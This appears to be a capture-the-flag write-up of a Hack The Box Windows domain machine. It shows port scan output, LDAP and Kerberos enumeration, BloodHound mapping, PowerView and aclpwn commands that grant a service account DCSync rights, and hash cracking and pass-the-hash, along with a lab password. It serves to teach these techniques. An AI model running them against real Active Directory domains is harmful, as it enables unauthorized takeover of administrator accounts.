Increasing send delay for 10.10.10.161 from 0 to 5 due to 153 out of 381 dropped probes since last increase.
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.063s latency).
Scanned at 2020-01-11 17:17:58 CET for 772s
Not shown: 65511 closed ports
Reason: 65511 resets
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
|fingerprint-strings:
|DNSVersionBindReqTCP:
|version
|_bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-11 16:34:24Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49715/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
So now we have a list of users but no password maybe we could have more informations with
ldapsearch -LLL -x -H ldap://10.10.10.161 -b "DC=HTB,DC=local" -s sub "(objectclass=*)"
But nothing interesting for the moment. I get a bit stuck here for a moment, then I decided to look to the Kerberos service.
There is a well known attack although very rare : AS-REP Roasting. When an user is asking for a TGT to the KDC he musts authenticate by providing his password then the KDC answer through the KRB_AS_REP packet which contains the session key for the user which is encrypted with the user hash.
However if the administrator has disable the pre authentication, everybody can request a TGT for another user. This TGT will be encrypted with the impersonated user hash, so we can extract this user hash and attempt to crack it or execute pass the hash attack.
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS> net user sebastien /domain
User name sebastien
Full Name Sebastien Caron
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/19/2019 4:29:59 PM
Password expires Never
Password changeable 9/20/2019 4:29:59 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/22/2019 2:29:29 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
We are member of some interesting services :
HTB\Privileged IT Accounts
HTB\Service Accounts
There is also the users sebastien in C:\Users\sebastien but running net user sebastien /domain show that the users is not very privileged.
Bloodhound
I decided to go through with bloodhound in order to indentify targets and map the AD. It was the first time using it.
Populating Bloodhound
Bloodhound needs data to trace all relations between AD objects so we need to gather it for him.
I read in the documentation that an user is to required but I didn’t find a way to do it without. Anyway more privileged we have easier will be the escaladation.
There is at least 3 ways to gather information :
PS1 script
.exe
python script
My first try is with a python script bloodhound-python (pip install bloodhound). I ran this command
$ Invoke-BloodHound -LDAPUser svc-alfresco -LDAPPass s3rvice -CollectionMethod All -Verbose
I don’t know why I had to provide the LDAP login args but without the command would fail silently. So now we have a nice zip file we can let on a smb share started thanks to impacket and feed bloodhound with the json files.
path to admin
Once bloodhound is fed you can choose to start from your compromised user and see in which group it belong and which permission it have on which object.
Or if you are lucky just run a default queries like Find the shortest path to domain admin. Like I did
So :
svc-alfresco is member of Privileged IT Account group
Privileged IT Account group is member of Account Operators group
Account Operatorshas GenericAll right on Exchange Windows Permissions group
Exchange Windows Permissions group can write and Dacl for the HTB.local domain
the HTB.local domain contains the Administrator@HTB.local
(Administrator@HTB.local is member of Domain Admins)
As Group memberships within AD are applied recursively if we have the following hierarchy :
Group A
Group B
Group C
If we had an user in C, he will also have the permission of group A and B in addition to the group C.
And the permissions on object
GenericAll - full rights to the object (add users to a group or reset user’s password)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object’s ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user’s password
Self (Self-Membership) - ability to add yourself to a group
So svc-alfresco is part of the Account Operator by inheritance. This account has GenericAll rights on the Exchange Windows Permissions it mean we can add svc-alfresco to this group. Then once included in the group he will have WriteDACL permission on the HTB.LOCAL domain object.
An ACL specify who can do what on an object.
We are now allowed to grant to svc-alfresco the DCSync privilege ! We can ask a DC it data as the Administrator hash.
road to admin
Bloodhound can describe each step to our target. For example we need to add svc-alfresco in the Exchange Windows Permission group with the GenericAll permission :
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLABdfm.a', $SecPassword) Then, use Add-DomainGroupMember, optionally specifying $Cred if you are not already running a process as ACCOUNT OPERATORS@HTB.LOCA L: Add-DomainGroupMember -Identity 'Exchange Windows Permission' -Members 'svc-alfresco' -Credential $Cred
Using Powerview
or using only powershell without cmdlet
$ net group"Exchange Windows Permission""svc-alfresco" /add /domain
Then we have to write an ACL to the HTB.local domain object to grant ourself the DCSync right.
We now have the right to perform a DC synchronisation with svc-alfresco
But if you are really lazy you can use ACLpwn (https://github.com/fox-it/aclpwn.py) once you have identified a potential path. The script will make the change for you
Please supply the password or LM:NTLM hashes of the account you are escalating from:
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer)
[-] Invalid path, skipping
[+] Path found!
Path [0]: (SVC-ALFRESCO@HTB.LOCAL)-[MemberOf]->(SERVICE ACCOUNTS@HTB.LOCAL)-[MemberOf]->(PRIVILEGED IT ACCOUNTS@HTB.LOCAL)-[MemberOf]->(ACCOUNT OPERATORS@HTB.LOCAL)-[GenericAll]->(EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL)-[MemberOf]->(EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)-[WriteDacl]->(HTB.LOCAL)
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain)
[-] Invalid path, skipping
[+] Path found!
Path [1]: (SVC-ALFRESCO@HTB.LOCAL)-[MemberOf]->(SERVICE ACCOUNTS@HTB.LOCAL)-[MemberOf]->(PRIVILEGED IT ACCOUNTS@HTB.LOCAL)-[MemberOf]->(ACCOUNT OPERATORS@HTB.LOCAL)-[GenericAll]->(EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof ->continue
[-] Memberof ->continue
[-] Memberof ->continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of SVC-ALFRESCO@HTB.LOCAL
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20200115-102327.restore
Some operations are not supported so it’s possible that the script give up some path even if they are possible.
Here it found 2 path, I choosed the shortest one as it allow less mistakes. As you see it added the user to the right group and modified the ACL as we wanted to !
We have now to perform a DC synchronisation. I read a lot about using Mimikatz to do it however we don’t have admin rights to use it. So I tried to find other ways.
At first sight I though I was lacking permission but waiting a bit gave the hashes ! I fed john with but I only get the santi password which is useless. I didn’t use crackstation to see if the was wellknow as in htb if the password isn’t in rockyou it’s not intented to be breakable.
Pass The Hash
On several windows services you can authenticate with only the hash, Crackmapexec for example allow us to query smb services with only the hash